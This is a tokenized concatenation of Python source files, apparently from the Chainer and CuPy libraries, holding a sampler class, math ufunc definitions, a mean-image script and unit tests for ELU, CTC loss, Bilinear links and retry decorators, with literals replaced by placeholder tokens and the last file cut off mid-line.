<EOL> def sample ( self , shape ) : <EOL> """<STR_LIT>""" <EOL> if self . use_gpu : <EOL> return self . sample_gpu ( shape ) <EOL> else : <EOL> return self . sample_cpu ( shape ) <EOL> def sample_cpu ( self , shape ) : <EOL> ps = numpy . random . uniform ( <NUM_LIT:0> , <NUM_LIT:1> , shape ) <EOL> pb = ps * len ( self . threshold ) <EOL> index = pb . astype ( numpy . int32 ) <EOL> left_right = ( self . threshold [ index ] < pb - index ) . astype ( numpy . int32 ) <EOL> return self . values [ index * <NUM_LIT:2> + left_right ] <EOL> def sample_gpu ( self , shape ) : <EOL> ps = cuda . cupy . random . uniform ( size = shape , dtype = numpy . float32 ) <EOL> vs = cuda . elementwise ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' <EOL> ) ( ps , self . threshold , self . values , len ( self . threshold ) ) <EOL> return vs </s>
<s> </s>
<s> from cupy . math import ufunc <EOL> rint = ufunc . create_math_ufunc ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' , <EOL> '''<STR_LIT>''' ) <EOL> floor = ufunc . create_math_ufunc ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' , <EOL> '''<STR_LIT>''' ) <EOL> ceil = ufunc . create_math_ufunc ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' , <EOL> '''<STR_LIT>''' ) <EOL> trunc = ufunc . create_math_ufunc ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' , <EOL> '''<STR_LIT>''' ) </s>
<s> import argparse <EOL> import os <EOL> import sys <EOL> import numpy <EOL> from PIL import Image <EOL> import six . moves . cPickle as pickle <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , default = '<STR_LIT:.>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> sum_image = None <EOL> count = <NUM_LIT:0> <EOL> for line in open ( args . dataset ) : <EOL> filepath = os . path . join ( args . root , line . strip ( ) . split ( ) [ <NUM_LIT:0> ] ) <EOL> image = numpy . asarray ( Image . open ( filepath ) ) . transpose ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> if sum_image is None : <EOL> sum_image = numpy . ndarray ( image . shape , dtype = numpy . float32 ) <EOL> sum_image [ : ] = image <EOL> else : <EOL> sum_image += image <EOL> count += <NUM_LIT:1> <EOL> sys . stderr . write ( '<STR_LIT>' . format ( count ) ) <EOL> sys . stderr . flush ( ) <EOL> sys . stderr . write ( '<STR_LIT:\n>' ) <EOL> mean = sum_image / count <EOL> pickle . dump ( mean , open ( args . output , '<STR_LIT:wb>' ) , - <NUM_LIT:1> ) </s>
<s> import random <EOL> import unittest <EOL> import numpy <EOL> import chainer <EOL> from chainer import cuda <EOL> from chainer import functions <EOL> from chainer import gradient_check <EOL> from chainer import testing <EOL> from chainer . testing import attr <EOL> from chainer . testing import condition <EOL> class TestELU ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . x = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , ( <NUM_LIT:5> , <NUM_LIT:4> ) ) . astype ( numpy . float32 ) <EOL> for i in range ( self . x . size ) : <EOL> if - <NUM_LIT> < self . x . flat [ i ] < <NUM_LIT> : <EOL> self . x . flat [ i ] = <NUM_LIT:0.5> <EOL> self . gy = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , ( <NUM_LIT:5> , <NUM_LIT:4> ) ) . astype ( numpy . float32 ) <EOL> self . alpha = random . random ( ) <EOL> def check_forward ( self , x_data ) : <EOL> x = chainer . Variable ( x_data ) <EOL> y = functions . elu ( x , alpha = self . alpha ) <EOL> self . assertEqual ( y . data . dtype , numpy . float32 ) <EOL> expected = self . x . copy ( ) <EOL> for i in numpy . ndindex ( self . x . shape ) : <EOL> if self . x [ i ] < <NUM_LIT:0> : <EOL> expected [ i ] = self . alpha * ( numpy . exp ( expected [ i ] ) - <NUM_LIT:1> ) <EOL> gradient_check . assert_allclose ( expected , y . data ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_forward_cpu ( self ) : <EOL> self . check_forward ( self . x ) <EOL> @ attr . gpu <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_forward_gpu ( self ) : <EOL> self . check_forward ( cuda . to_gpu ( self . x ) ) <EOL> def check_backward ( self , x_data , y_grad ) : <EOL> gradient_check . check_backward ( <EOL> functions . ELU ( self . alpha ) , x_data , y_grad ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_cpu ( self ) : <EOL> self . check_backward ( self . x , self . gy ) <EOL> @ attr . gpu <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_gpu ( self ) : <EOL> self . check_backward ( cuda . to_gpu ( self . x ) , cuda . to_gpu ( self . gy ) ) <EOL> testing . run_module ( __name__ , __file__ ) </s>
<s> import math <EOL> import unittest <EOL> import numpy <EOL> import chainer <EOL> from chainer import cuda <EOL> from chainer import functions <EOL> from chainer import gradient_check <EOL> from chainer import testing <EOL> from chainer . testing import attr <EOL> from chainer . testing import condition <EOL> class TestCTC ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . x = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> ) ) . astype ( numpy . float32 ) <EOL> self . t = numpy . array ( [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ) . astype ( numpy . int32 ) <EOL> self . l = numpy . array ( [ [ <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:2> ] ] ) . astype ( numpy . int32 ) <EOL> self . blank_symbol = <NUM_LIT:2> <EOL> self . x_length = numpy . full ( ( len ( self . x [ <NUM_LIT:0> ] ) , ) , len ( self . x ) , dtype = '<STR_LIT:i>' ) <EOL> self . l_length = numpy . full ( ( len ( self . t ) , ) , len ( self . t [ <NUM_LIT:0> ] ) , dtype = '<STR_LIT:i>' ) <EOL> self . use_length = True <EOL> def alpha ( self , x , l , t , u ) : <EOL> if u < <NUM_LIT:0> : <EOL> return <NUM_LIT:0.0> <EOL> if t == <NUM_LIT:0> : <EOL> if u == <NUM_LIT:0> : <EOL> return x [ <NUM_LIT:0> ] [ self . blank_symbol ] <EOL> elif u == <NUM_LIT:1> : <EOL> return x [ <NUM_LIT:0> ] [ l [ <NUM_LIT:1> ] ] <EOL> else : <EOL> return <NUM_LIT:0.0> <EOL> elif l [ u ] == self . blank_symbol or l [ u ] == l [ u - <NUM_LIT:2> ] : <EOL> return ( x [ t ] [ l [ u ] ] * <EOL> ( self . alpha ( x , l , t - <NUM_LIT:1> , u - <NUM_LIT:1> ) + <EOL> self . alpha ( x , l , t - <NUM_LIT:1> , u ) ) ) <EOL> else : <EOL> return ( x [ t ] [ l [ u ] ] * <EOL> ( self . alpha ( x , l , t - <NUM_LIT:1> , u - <NUM_LIT:2> ) + <EOL> self . alpha ( x , l , t - <NUM_LIT:1> , u - <NUM_LIT:1> ) + <EOL> self . alpha ( x , l , t - <NUM_LIT:1> , u ) ) ) <EOL> def check_forward ( self , t_data , xs_data , l_length , x_length ) : <EOL> x = tuple ( chainer . Variable ( x_data ) for x_data in xs_data ) <EOL> t = chainer . Variable ( t_data ) <EOL> args = ( x , t , self . blank_symbol ) <EOL> if self . use_length : <EOL> args += ( chainer . Variable ( x_length ) , chainer . Variable ( l_length ) ) <EOL> loss = functions . connectionist_temporal_classification ( * args ) <EOL> loss_value = float ( loss . data ) <EOL> xp = cuda . get_array_module ( self . x ) <EOL> xt = xp . swapaxes ( self . x , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> for b in range ( xt . shape [ <NUM_LIT:0> ] ) : <EOL> for t in range ( xt . shape [ <NUM_LIT:1> ] ) : <EOL> xt [ b ] [ t ] = numpy . exp ( xt [ b ] [ t ] ) / numpy . sum ( numpy . exp ( xt [ b ] [ t ] ) ) <EOL> loss_expect = <NUM_LIT:0> <EOL> batch_size = xt . shape [ <NUM_LIT:0> ] <EOL> path_length = <NUM_LIT:2> * l_length + <NUM_LIT:1> <EOL> for xtb , lb , xlb , plb in zip ( xt , self . l , x_length , path_length ) : <EOL> loss_expect += - math . log ( <EOL> self . alpha ( xtb , lb , int ( xlb - <NUM_LIT:1> ) , int ( plb - <NUM_LIT:1> ) ) + <EOL> self . alpha ( xtb , lb , int ( xlb - <NUM_LIT:1> ) , int ( plb - <NUM_LIT:2> ) ) ) <EOL> loss_expect /= batch_size <EOL> self . assertAlmostEqual ( loss_expect , loss_value , places = <NUM_LIT:5> ) <EOL> def test_forward_cpu ( self ) : <EOL> self . check_forward ( self . t , tuple ( self . x ) , <EOL> self . l_length , self . x_length ) <EOL> @ attr . gpu <EOL> def test_forward_gpu ( self ) : <EOL> self . check_forward ( cuda . to_gpu ( self . t ) , <EOL> tuple ( cuda . to_gpu ( x_data ) for x_data in self . x ) , <EOL> cuda . to_gpu ( self . l_length ) , <EOL> cuda . to_gpu ( self . x_length ) ) <EOL> def check_backward ( self , t_data , xs_data , l_length , x_length ) : <EOL> gradient_check . check_backward ( <EOL> functions . ConnectionistTemporalClassification ( self . blank_symbol ) , <EOL> ( x_length , l_length , t_data ) + xs_data , None , eps = <NUM_LIT> , atol = <NUM_LIT> ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_cpu ( self ) : <EOL> self . check_backward ( self . t , tuple ( self . x ) , <EOL> self . l_length , self . x_length ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> @ attr . gpu <EOL> def test_backward_gpu ( self ) : <EOL> self . check_backward ( cuda . to_gpu ( self . t ) , <EOL> tuple ( cuda . to_gpu ( x_data ) for x_data in self . x ) , <EOL> cuda . to_gpu ( self . l_length ) , <EOL> cuda . to_gpu ( self . x_length ) ) <EOL> class TestCTCWithoutLength ( TestCTC ) : <EOL> def setUp ( self ) : <EOL> super ( TestCTCWithoutLength , self ) . setUp ( ) <EOL> self . use_length = False <EOL> class TestCTCWithLabelPadding ( TestCTC ) : <EOL> def setUp ( self ) : <EOL> super ( TestCTCWithLabelPadding , self ) . setUp ( ) <EOL> self . l_length [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> class TestCTCWithInputPadding ( TestCTC ) : <EOL> def setUp ( self ) : <EOL> super ( TestCTCWithInputPadding , self ) . setUp ( ) <EOL> self . x_length [ <NUM_LIT:0> ] = <NUM_LIT:3> <EOL> class TestCTCWithAllPadding ( TestCTC ) : <EOL> def setUp ( self ) : <EOL> super ( TestCTCWithAllPadding , self ) . setUp ( ) <EOL> self . x_length [ ... ] = <NUM_LIT:3> <EOL> self . l_length [ ... ] = <NUM_LIT:1> <EOL> class TestCTCBlankSymbol ( TestCTC ) : <EOL> def setUp ( self ) : <EOL> super ( TestCTCBlankSymbol , self ) . setUp ( ) <EOL> self . x = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) ) . astype ( numpy . float32 ) <EOL> self . l = numpy . array ( [ [ <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:3> ] ] ) . astype ( numpy . int32 ) <EOL> self . blank_symbol = <NUM_LIT:3> <EOL> class TestCTCUseVolatile ( unittest . TestCase ) : <EOL> def test_volatile ( self ) : <EOL> xs_data = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> ) ) . astype ( numpy . float32 ) <EOL> t_data = numpy . array ( [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ) . astype ( numpy . int32 ) <EOL> x = [ chainer . Variable ( x_data , volatile = True ) for x_data in xs_data ] <EOL> t = chainer . Variable ( t_data , volatile = True ) <EOL> functions . connectionist_temporal_classification ( x , t , <NUM_LIT:2> ) <EOL> class TestCTCError ( unittest . TestCase ) : <EOL> def test_not_iterable ( self ) : <EOL> x = chainer . Variable ( numpy . zeros ( ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> ) , numpy . float32 ) ) <EOL> t = chainer . Variable ( numpy . zeros ( ( <NUM_LIT:2> , <NUM_LIT:2> ) , numpy . int32 ) ) <EOL> with self . assertRaises ( TypeError ) : <EOL> functions . connectionist_temporal_classification ( x , t , <NUM_LIT:0> ) <EOL> testing . run_module ( __name__ , __file__ ) </s>
<s> import unittest <EOL> import numpy <EOL> import chainer <EOL> from chainer import cuda <EOL> from chainer import gradient_check <EOL> from chainer import links <EOL> from chainer import testing <EOL> from chainer . testing import attr <EOL> from chainer . testing import condition <EOL> from chainer . utils import array <EOL> def _check_forward ( e1 , e2 , f , y_expect ) : <EOL> e1 = chainer . Variable ( e1 ) <EOL> e2 = chainer . Variable ( e2 ) <EOL> y = f ( e1 , e2 ) <EOL> gradient_check . assert_allclose ( y_expect , y . data ) <EOL> def _check_backward ( e1 , e2 , y_grad , link , bias ) : <EOL> params = [ link . W ] <EOL> if bias : <EOL> params . append ( link . b ) <EOL> gradient_check . check_backward ( <EOL> link , ( e1 , e2 ) , y_grad , params , eps = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def _batch_to_gpu ( * xs ) : <EOL> return tuple ( cuda . to_gpu ( x ) for x in xs ) <EOL> def _uniform ( * shape ) : <EOL> return numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , shape ) . astype ( numpy . float32 ) <EOL> class TestBilinear ( unittest . TestCase ) : <EOL> in_shape = ( <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> out_size = <NUM_LIT:4> <EOL> batch_size = <NUM_LIT:10> <EOL> def setUp ( self ) : <EOL> self . f = links . Bilinear ( <EOL> self . in_shape [ <NUM_LIT:0> ] , self . in_shape [ <NUM_LIT:1> ] , self . out_size ) <EOL> self . f . W . data [ ... ] = _uniform ( * self . f . W . data . shape ) <EOL> self . f . V1 . data [ ... ] = _uniform ( * self . f . V1 . data . shape ) <EOL> self . f . V2 . data [ ... ] = _uniform ( * self . f . V2 . data . shape ) <EOL> self . f . b . data [ ... ] = _uniform ( * self . f . b . data . shape ) <EOL> self . f . zerograds ( ) <EOL> self . W = self . f . W . data . copy ( ) <EOL> self . V1 = self . f . V1 . data . copy ( ) <EOL> self . V2 = self . f . V2 . data . copy ( ) <EOL> self . b = self . f . b . data . copy ( ) <EOL> self . e1 = _uniform ( self . batch_size , self . in_shape [ <NUM_LIT:0> ] ) <EOL> self . e2 = _uniform ( self . batch_size , self . in_shape [ <NUM_LIT:1> ] ) <EOL> self . gy = _uniform ( self . batch_size , self . out_size ) <EOL> self . y = ( <EOL> numpy . einsum ( '<STR_LIT>' , self . e1 , self . e2 , self . W ) + <EOL> self . e1 . dot ( self . V1 ) + self . e2 . dot ( self . V2 ) + self . b ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_forward_cpu ( self ) : <EOL> _check_forward ( self . e1 , self . e2 , self . f , self . y ) <EOL> @ attr . gpu <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_forward_gpu ( self ) : <EOL> self . f . to_gpu ( ) <EOL> _check_forward ( cuda . to_gpu ( self . e1 ) , <EOL> cuda . to_gpu ( self . e2 ) , <EOL> self . f , self . y ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_cpu ( self ) : <EOL> _check_backward ( self . e1 , self . e2 , self . gy , self . f , True ) <EOL> @ attr . gpu <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_gpu ( self ) : <EOL> self . f . to_gpu ( ) <EOL> _check_backward ( cuda . to_gpu ( self . e1 ) , <EOL> cuda . to_gpu ( self . e2 ) , <EOL> cuda . to_gpu ( self . gy ) , <EOL> self . f , True ) <EOL> class TestBilinear2 ( TestBilinear ) : <EOL> def setUp ( self ) : <EOL> super ( TestBilinear2 , self ) . setUp ( ) <EOL> assert self . in_shape [ <NUM_LIT:1> ] % <NUM_LIT:2> == <NUM_LIT:0> <EOL> self . e1 = _uniform ( self . batch_size , <NUM_LIT:1> , self . in_shape [ <NUM_LIT:0> ] ) <EOL> self . e2 = _uniform ( self . batch_size , self . in_shape [ <NUM_LIT:1> ] // <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> self . gy = _uniform ( self . batch_size , self . out_size ) <EOL> e1 = array . as_mat ( self . e1 ) <EOL> e2 = array . as_mat ( self . e2 ) <EOL> self . y = ( <EOL> numpy . einsum ( '<STR_LIT>' , e1 , e2 , self . W ) + <EOL> e1 . dot ( self . V1 ) + e2 . dot ( self . V2 ) + self . b ) <EOL> class TestBilinear3 ( TestBilinear ) : <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinear4 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> class TestBilinear5 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> class TestBilinear6 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> class TestBilinear7 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinear8 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinear9 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinearWOBias ( TestBilinear ) : <EOL> def setUp ( self ) : <EOL> self . f = links . Bilinear ( <EOL> self . in_shape [ <NUM_LIT:0> ] , self . in_shape [ <NUM_LIT:1> ] , self . out_size , True ) <EOL> W = self . f . W . data <EOL> W [ ... ] = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , W . shape ) <EOL> self . f . zerograds ( ) <EOL> self . W = W . copy ( ) <EOL> self . e1 = _uniform ( self . batch_size , self . in_shape [ <NUM_LIT:0> ] ) <EOL> self . e2 = _uniform ( self . batch_size , self . in_shape [ <NUM_LIT:1> ] ) <EOL> self . gy = _uniform ( self . batch_size , self . out_size ) <EOL> self . y = numpy . einsum ( '<STR_LIT>' , self . e1 , self . e2 , self . W ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_cpu ( self ) : <EOL> _check_backward ( self . e1 , self . e2 , self . gy , self . f , False ) <EOL> @ attr . gpu <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_gpu ( self ) : <EOL> self . f . to_gpu ( ) <EOL> _check_backward ( cuda . to_gpu ( self . e1 ) , cuda . to_gpu ( self . e2 ) , <EOL> cuda . to_gpu ( self . gy ) , self . f , False ) <EOL> class TestBilinearWOBias2 ( TestBilinearWOBias ) : <EOL> def setUp ( self ) : <EOL> super ( TestBilinearWOBias2 , self ) . setUp ( ) <EOL> assert self . in_shape [ <NUM_LIT:1> ] % <NUM_LIT:2> == <NUM_LIT:0> <EOL> self . e1 = _uniform ( self . batch_size , <NUM_LIT:1> , self . in_shape [ <NUM_LIT:0> ] ) <EOL> self . e2 = _uniform ( self . batch_size , <NUM_LIT:2> , self . in_shape [ <NUM_LIT:1> ] // <NUM_LIT:2> ) <EOL> self . gy = _uniform ( self . batch_size , self . out_size ) <EOL> e1 = array . as_mat ( self . e1 ) <EOL> e2 = array . as_mat ( self . e2 ) <EOL> self . y = numpy . einsum ( '<STR_LIT>' , e1 , e2 , self . W ) <EOL> class TestBilinearWOBias3 ( TestBilinearWOBias ) : <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinearWOBias4 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> class TestBilinearWOBias5 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> class TestBilinearWOBias6 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> class TestBilinearWOBias7 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinearWOBias8 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinearWOBias9 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> out_size = <NUM_LIT:1> <EOL> class InitByInitialParameter ( unittest . TestCase ) : <EOL> in_shape = ( <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> out_size = <NUM_LIT:4> <EOL> batch_size = <NUM_LIT:10> <EOL> def setUp ( self ) : <EOL> self . W = _uniform ( self . in_shape [ <NUM_LIT:0> ] , self . in_shape [ <NUM_LIT:1> ] , self . out_size ) <EOL> self . V1 = _uniform ( self . in_shape [ <NUM_LIT:0> ] , self . out_size ) <EOL> self . V2 = _uniform ( self . in_shape [ <NUM_LIT:1> ] , self . out_size ) <EOL> self . b = _uniform ( self . out_size , ) <EOL> class NormalInitialParameter ( InitByInitialParameter ) : <EOL> def check_normal ( self , initialW , initial_bias , nobias ) : <EOL> links . Bilinear ( <EOL> self . in_shape [ <NUM_LIT:0> ] , self . in_shape [ <NUM_LIT:1> ] , self . out_size , nobias , <EOL> initialW , initial_bias ) <EOL> def test_normal_cpu_bias ( self ) : <EOL> self . check_normal ( self . W , ( self . V1 , self . V2 , self . b ) , False ) <EOL> def test_normal_cpu_nobias ( self ) : <EOL> self . check_normal ( self . W , None , False ) <EOL> class InvalidInitialParameter ( InitByInitialParameter ) : <EOL> def setUp ( self ) : <EOL> super ( InvalidInitialParameter , self ) . setUp ( ) <EOL> self . invalidW = _uniform ( self . in_shape [ <NUM_LIT:0> ] + <NUM_LIT:1> , self . in_shape [ <NUM_LIT:1> ] , <EOL> self . out_size ) <EOL> self . invalidV1 = _uniform ( self . in_shape [ <NUM_LIT:0> ] + <NUM_LIT:1> , self . out_size ) <EOL> self . invalidV2 = _uniform ( self . in_shape [ <NUM_LIT:1> ] + <NUM_LIT:1> , self . out_size ) <EOL> self . invalidb = _uniform ( self . out_size + <NUM_LIT:1> , ) <EOL> def check_invalid ( self , initialW , initial_bias , nobias ) : <EOL> with self . assertRaises ( AssertionError ) : <EOL> links . Bilinear ( <EOL> self . in_shape [ <NUM_LIT:0> ] , self . in_shape [ <NUM_LIT:1> ] , self . out_size , nobias , <EOL> initialW , initial_bias ) <EOL> def test_invalidW_cpu ( self ) : <EOL> self . check_invalid ( self . invalidW , ( self . V1 , self . V2 , self . b ) , False ) <EOL> self . check_invalid ( self . invalidW , None , True ) <EOL> def test_invalidV1_cpu ( self ) : <EOL> self . check_invalid ( self . W , ( self . invalidV1 , self . V2 , self . b ) , False ) <EOL> def test_invalidV2_cpu ( self ) : <EOL> self . check_invalid ( self . W , ( self . V1 , self . invalidV2 , self . b ) , False ) <EOL> def test_invalidb_cpu ( self ) : <EOL> self . check_invalid ( self . W , ( self . V1 , self . V2 , self . invalidb ) , False ) <EOL> testing . run_module ( __name__ , __file__ ) </s>
<s> import unittest <EOL> from chainer import testing <EOL> from chainer . testing import condition <EOL> class MockUnitTest ( unittest . TestCase ) : <EOL> failure_case_counter = <NUM_LIT:0> <EOL> success_case_counter = <NUM_LIT:0> <EOL> probabilistic_case_counter = <NUM_LIT:0> <EOL> probabilistic_case_success_counter = <NUM_LIT:0> <EOL> probabilistic_case_failure_counter = <NUM_LIT:0> <EOL> def failure_case ( self ) : <EOL> self . failure_case_counter += <NUM_LIT:1> <EOL> self . fail ( ) <EOL> def success_case ( self ) : <EOL> self . success_case_counter += <NUM_LIT:1> <EOL> self . assertTrue ( True ) <EOL> def error_case ( self ) : <EOL> raise Exception ( ) <EOL> def probabilistic_case ( self ) : <EOL> self . probabilistic_case_counter += <NUM_LIT:1> <EOL> if self . probabilistic_case_counter % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> self . probabilistic_case_success_counter += <NUM_LIT:1> <EOL> self . assertTrue ( True ) <EOL> else : <EOL> self . probabilistic_case_failure_counter += <NUM_LIT:1> <EOL> self . fail ( ) <EOL> def runTest ( self ) : <EOL> pass <EOL> def _should_fail ( self , f ) : <EOL> try : <EOL> f ( self . unit_test ) <EOL> self . fail ( <EOL> '<STR_LIT>' ) <EOL> except AssertionError as e : <EOL> self . assertIn ( '<STR_LIT>' , str ( e ) ) <EOL> def _should_pass ( self , f ) : <EOL> f ( self . unit_test ) <EOL> class TestRepeatWithSuccessAtLeast ( unittest . TestCase ) : <EOL> def _decorate ( self , f , times , min_success ) : <EOL> return condition . repeat_with_success_at_least ( <EOL> times , min_success ) ( f ) <EOL> def setUp ( self ) : <EOL> self . unit_test = MockUnitTest ( ) <EOL> def test_all_trials_fail ( self ) : <EOL> f = self . _decorate ( MockUnitTest . failure_case , <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> _should_fail ( self , f ) <EOL> self . assertEqual ( self . unit_test . failure_case_counter , <NUM_LIT:10> ) <EOL> def test_all_trials_fail2 ( self ) : <EOL> f = self . _decorate ( MockUnitTest . failure_case , <NUM_LIT:10> , <NUM_LIT:0> ) <EOL> _should_pass ( self , f ) <EOL> self . assertLessEqual ( self . unit_test . failure_case_counter , <NUM_LIT:10> ) <EOL> def test_all_trials_error ( self ) : <EOL> f = self . _decorate ( MockUnitTest . error_case , <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> _should_fail ( self , f ) <EOL> def test_all_trials_succeed ( self ) : <EOL> f = self . _decorate ( MockUnitTest . success_case , <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> _should_pass ( self , f ) <EOL> self . assertEqual ( self . unit_test . success_case_counter , <NUM_LIT:10> ) <EOL> def test_all_trials_succeed2 ( self ) : <EOL> self . assertRaises ( AssertionError , <EOL> condition . repeat_with_success_at_least , <EOL> <NUM_LIT:10> , <NUM_LIT:11> ) <EOL> def test_half_of_trials_succeed ( self ) : <EOL> f = self . _decorate ( MockUnitTest . probabilistic_case , <NUM_LIT:10> , <NUM_LIT:5> ) <EOL> _should_pass ( self , f ) <EOL> self . assertLessEqual ( self . unit_test . probabilistic_case_counter , <NUM_LIT:10> ) <EOL> self . assertGreaterEqual ( <EOL> self . unit_test . probabilistic_case_success_counter , <NUM_LIT:5> ) <EOL> self . assertLessEqual ( <EOL> self . unit_test . probabilistic_case_failure_counter , <NUM_LIT:5> ) <EOL> def test_half_of_trials_succeed2 ( self ) : <EOL> f = self . _decorate ( MockUnitTest . probabilistic_case , <NUM_LIT:10> , <NUM_LIT:6> ) <EOL> _should_fail ( self , f ) <EOL> self . assertLessEqual ( self . unit_test . probabilistic_case_counter , <NUM_LIT:10> ) <EOL> self . assertLess ( <EOL> self . unit_test . probabilistic_case_success_counter , <NUM_LIT:6> ) <EOL> self . assertGreaterEqual ( <EOL> self . unit_test . probabilistic_case_failure_counter , <NUM_LIT:5> ) <EOL> class TestRepeat ( unittest . TestCase ) : <EOL> def _decorate ( self , f , times ) : <EOL> return condition . repeat ( times ) ( f ) <EOL> def setUp ( self ) : <EOL> self . unit_test = MockUnitTest ( ) <EOL> def test_failure_case ( self ) : <EOL> f = self . _decorate ( MockUnitTest . failure_case , <NUM_LIT:10> ) <EOL> _should_fail ( self , f ) <EOL> self . assertLessEqual ( self . unit_test . failure_case_counter , <NUM_LIT:10> ) <EOL> def test_success_case ( self ) : <EOL> f = self . _decorate ( MockUnitTest . success_case , <NUM_LIT:10> ) <EOL> _should_pass ( self , f ) <EOL> self . assertEqual ( self . unit_test . success_case_counter , <NUM_LIT:10> ) <EOL> def test_probabilistic_case ( self ) : <EOL> f = self . _decorate ( MockUnitTest . probabilistic_case , <NUM_LIT:10> ) <EOL> _should_fail ( self , f ) <EOL> self . assertLessEqual ( self . unit_test . probabilistic_case_counter , <NUM_LIT:10> ) <EOL> self . assertLess ( self . unit_test . probabilistic_case_success_counter , <NUM_LIT:10> ) <EOL> self . assertGreater ( <EOL> self . unit_test . probabilistic_case_failure_counter , <NUM_LIT:0> ) <EOL> class TestRetry ( unittest . TestCase ) : <EOL> def _decorate ( self , f , times ) : <EOL> return condition . retry ( times ) ( f ) <EOL> def setUp ( self ) : <EOL> self . unit_test = MockUnitTest ( ) <EOL> def test_failure_case ( self ) : <EOL> f = self . _decorate ( MockUnitTest . failure_case , <NUM_LIT:10> ) <EOL> _should_fail ( self , f ) <EOL> self . assertEqual ( self . unit_test . failure_case_counter , <NUM_LIT:10> ) <EOL> def test_success_case ( self ) : <EOL> f = self . _decorate ( MockUnitTest . success_case , <NUM_LIT:10> ) <EOL> _should_pass ( self , f ) <EOL> self . assertLessEqual ( self . 